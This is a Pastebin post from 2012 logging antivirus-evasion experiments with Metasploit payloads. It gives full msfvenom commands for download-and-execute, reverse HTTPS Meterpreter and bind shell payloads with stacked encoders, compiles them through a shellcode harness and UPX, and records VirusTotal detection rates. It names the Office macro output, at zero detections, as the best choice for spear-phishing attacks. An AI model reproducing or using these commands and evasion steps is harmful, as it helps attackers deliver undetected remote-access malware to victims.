API tools faq
paste
Advertisement
infodox

AV Bypassing Test

infodox
Mar 22nd, 2012
1,067
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.14 KB | None | 0 0
raw download clone embed print report
  1. Using Shellcode execution as a possible antivirus bypassal technique.
  2.  
  3. Ok, first off, we need to create our malicious "shellcode payload"... I have a few examples below of some possible payloads we could be using.
  4.  
  5. 1. Download and execute.
  6.  
  7. msfvenom -p windows/download_exec URL=http://www.example.com/malware.exe -e x86/shikata_ga_nai -i 5 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f c
  8.  
  9. 2. Reverse Meterpreter HTTPS shell
  10.  
  11. msfvenom -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=443 -e x86/shikata_ga_nai -i 5 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f c
  12.  
  13. 3. Standard Bind Shell
  14.  
  15. msfvenom -p windows/shell_bind_tcp LPORT=31337 -e x86/shikata_ga_nai -i 5 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f c
  16.  
  17. These are the three payloads I will be testing. The encoding I chose at random and just went with the encoding that "felt right". I will not be running them, just uploading them to VirusTotal to show you them compared to their .exe outputs. Bin size (before and after UPX) and AV detections will be taken as the final "idea of how awesome they are".
  18.  
  19. Step One: Download and Execute Payload.
  20.  
  21. Here is the commands we will be using to make our "native metasploit exe" version (direct MSFVENOM output) of the dl/exec payload.
  22.  
  23. msfvenom -p windows/download_exec URL=http://www.example.com/malware.exe -e x86/shikata_ga_nai -i 5 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f exe > /tmp/dlexec.exe
  24.  
  25. So. We got our binary, and we upload to VirusTotal Scanning service to see how many detections we get...
  26.  
  27. Filename: dlexec.exe
  28. Filesize: 72.1 KB
  29. MD5 Hash: aeace18d84af11640a219b2b557ee8ee
  30. Packing: No UPX used.
  31. Detections: 32/42
  32. (Detections are at time of scan)
  33. Link: https://www.virustotal.com/file/9e5c565e48de976e14d316db667cf22f3b50671f47e38ff0864775e5888ee51b/analysis/1332350345/
  34.  
  35. Next up we UPX it with this command: upx -9 dlexec.exe
  36.  
  37. Filesize: 47.0KB
  38. MD5 Hash: ac4375e1a7fe474548dd798bd60f8f04
  39. Detections: 27/43
  40. (Detections are at time of scan)
  41. Link: https://www.virustotal.com/file/fef15aee195c8bdcbbee3cbbc91fab36791a172096f06152e24a9b1862d1405c/analysis/1332350651/
  42.  
  43. Now, we re-do the whole thing with the ShellCodeExec Method which should be a LOT less detected.
  44.  
  45. First, we create our shellcode:
  46.  
  47. msfvenom -p windows/download_exec URL=http://www.example.com/malware.exe -e x86/shikata_ga_nai -i 5 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f c
  48.  
  49. Now, we pop it into our shellcode-harness...
  50. And compile: i586-mingw32msvc-gcc meta.c -o dlcrypt.exe
  51.  
  52. Filename: dlcrypt.exe
  53. Filesize: 20.1KB
  54. MD5 Hash: f873ab0d718dbd61b7987c7467ae589c
  55. Packing: No UPX used.
  56. Detections: 14 / 43
  57. (Detections are at time of scan)
  58. Link: https://www.virustotal.com/file/38f34eae9f19c401f61406d80d47e9280fa689b3abcfdfb17571849f69d0de17/analysis/1332351185/
  59.  
  60. As you can see, it is a far smaller file with a lot less detections. Lets UPX it and see what happens next...
  61.  
  62. Filename: dlcrypt.exe
  63. Filesize: 14.1 KB
  64. MD5 Hash: 03d634dde3d1e573d99776009e8567f5
  65. Packing: UPX used.
  66. Detections: 18 / 43
  67. (Detections are at time of scan)
  68. Link: https://www.virustotal.com/file/fc6e15bc19fc1f1bfaec9aeac8f2ede308e3d78b3e4efe90ab3b0804d8bafd4d/analysis/1332351313/
  69.  
  70. It would appear UPX is counterproductive to bypassing AV (packers normally are...) so tomorrow I will try the second payload, my FAVOURITE one, the Meterpreter Reverse HTTPS payload.
  71.  
  72.  
  73. Ok. Reverse HTTPS payload time!
  74.  
  75. Here is the commands we will be using to make our "native metasploit exe" version (direct MSFVENOM output) of the reverse https meterpreter payload.
  76.  
  77. msfvenom -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=443 -e x86/shikata_ga_nai -i 5 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f exe > /tmp/payload.exe
  78.  
  79. So. We got our binary, and we upload to VirusTotal Scanning service to see how many detections we get...
  80.  
  81. Filename: payload.exe
  82. Filesize: 72.1 KB
  83. MD5 Hash: dd347fcf69bdbc33f1ea2b318cf4831c
  84. Packing: No UPX used.
  85. Detections: 30 / 43
  86. (Detections are at time of scan)
  87. Link: https://www.virustotal.com/file/6a7cbf711f24a7ff1ae14a83ff193b4c17b3043516d5bd7366a7db736c793b8f/analysis/1332423872/
  88.  
  89. Next up, we UPX
  90.  
  91. Filename: payload.exe
  92. Filesize: 47.0 KB
  93. MD5 Hash: 5cdf49f9df5701f76b9ee9f8917e6d05
  94. Packing: UPX used.
  95. Detections: 26 / 42
  96. (Detections are at time of scan)
  97. Link: https://www.virustotal.com/file/fc11cfbcbd5d13a5acce3e4fb82f93133bbc62e8df6d00ff8478faa3bdf1e113/analysis/1332424184/
  98.  
  99. AS you can see, UPX had a positive effect this time. Now I then noticed something bloody amazing in the MSFVENOM manual.
  100.  
  101. exe-small output.
  102.  
  103. msfvenom -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=443 -f exe-small > /tmp/payload.exe
  104.  
  105. No encoding used this time BTW.
  106.  
  107. Filename: payload.exe
  108. Filesize: 4.5 KB
  109. MD5 Hash: 0bd184dd04ff1015ffbce7e792c2c598
  110. Packing: None
  111. Detections: 13 / 43
  112. Link: https://www.virustotal.com/file/bd9d1d6228e0aad08f3bb885bbf1d8f8e4c78b4530f8dd5b82da96e52b6a5c3f/analysis/1332424669/
  113.  
  114. SO, lets add some encoding and see what happens...
  115.  
  116. ##
  117.  
  118. msfvenom -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=443 -e x86/shikata_ga_nai -i 5 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f exe-small > 1.exe
  119.  
  120. https://www.virustotal.com/file/e946566e5c0162c4090f126cb12077926433f66c62c9354fa730242ade663b3c/analysis/1332427945/
  121.  
  122. More detected? WTF? Fine. lets move on...
  123.  
  124.  
  125. ##
  126.  
  127. Now, I started looking into alternative outputs... And came up with this.
  128.  
  129. msfvenom -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=443 -f vba-exe > /tmp/vba.exe
  130.  
  131. Filename: vba.exe
  132. Filesize: 290.2 KB
  133. MD5 Hash: aedde86916de88b856b22c6e384901bb
  134. Packing: None
  135. Detections: 0 / 42
  136. Link: https://www.virustotal.com/file/66e496f92029e31ab2c9df7ba886502efb3fa471d5451828df7c99d56f71dc56/analysis/1332427482/
  137.  
  138. This is a MS Office Macro payload. Simply open it in a text editor and follow the instructions...
  139.  
  140. Final Notes: The MS Office Macro payload is likely the most promising of the lot, as it can be directly embedded into a MS-Word document for spear phishing attacks, and seems to auto bypass things like AV.
  141.  
  142. Now for ONE LAST TRY: Objdump Pwnage.
  143.  
  144. root@shinigami:/tmp# msfvenom -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=443 -f exe-small > /tmp/micro.exe
  145. root@shinigami:/tmp# wget http://www.projectshellcode.com/downloads/xxd-shellcode.sh
  146. root@shinigami:/tmp# chmod +x xxd-shellcode.sh
  147. root@shinigami:/tmp# ./xxd-shellcode.sh micro.exe > sc.txt
  148. ### Here is where you pop the contents of sc.txt into the shellcode test harness as before ###
  149. root@shinigami:/tmp# i586-mingw32msvc-gcc sc.c -o helloshell.exe
  150.  
  151. SO now we scan our new binary... See how "bypassing" it is. We can take this further BTW...
  152.  
  153. MD5: 7642f0914ebbe62ddc8d64ffe7d52783
  154. File size: 24.1 KB ( 24650 bytes )
  155. File name: helloshell.exe
  156. File type: Win32 EXE
  157. Detection ratio: 10 / 43
  158. Link: https://www.virustotal.com/file/90add485b7df79d83588412ce59d76707c27914a2d0d86d731669670c4f6bac3/analysis/1332429280/
  159.  
  160. Next: We UPX it...
  161.  
  162. MD5: 963253a72210eb8bd7155137713112ba
  163. File size: 16.6 KB ( 16970 bytes )
  164. File name: helloshell.exe
  165. File type: Win32 EXE
  166. Detection ratio: 10 / 41
  167. Link: https://www.virustotal.com/file/6ca78ead1a8ef1c910f921eeab21af48a021db13872a3ad64a6ec6f8c2e228cb/analysis/1332429381/
  168.  
  169. So then I take this variant, pretend it is micro.exe, and re-encode it...
  170.  
  171. Result?
  172.  
  173. PRE UPX:
  174. MD5: a34d634236388762de0801acdd587cc9
  175. File size: 36.1 KB ( 36938 bytes )
  176. File name: helloshell2.exe
  177. File type: Win32 EXE
  178. Detection ratio: 5 / 43
  179. Link: https://www.virustotal.com/file/bc2e51bca3b3895bf59607ab1dbe1bbbfe6fff494642556660d30cf8dae1045e/analysis/1332429607/
  180.  
  181. POST UPX:
  182. Detections: 10 / 42
  183. Link: https://www.virustotal.com/file/726ced89801acc785f9360d595e7de390c3c19dafeecffcb2db14eb2d00e94b6/analysis/1332429713/
  184.  
  185.  
  186. root@shinigami:/tmp# exit
  187.  
  188.  
  189. I went up to 10 iterations with no real advantage, but perhaps alternating extra encodings (shigati_ga_nai) may help. i will investigate this later.
  190.  
  191. ~infodox
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!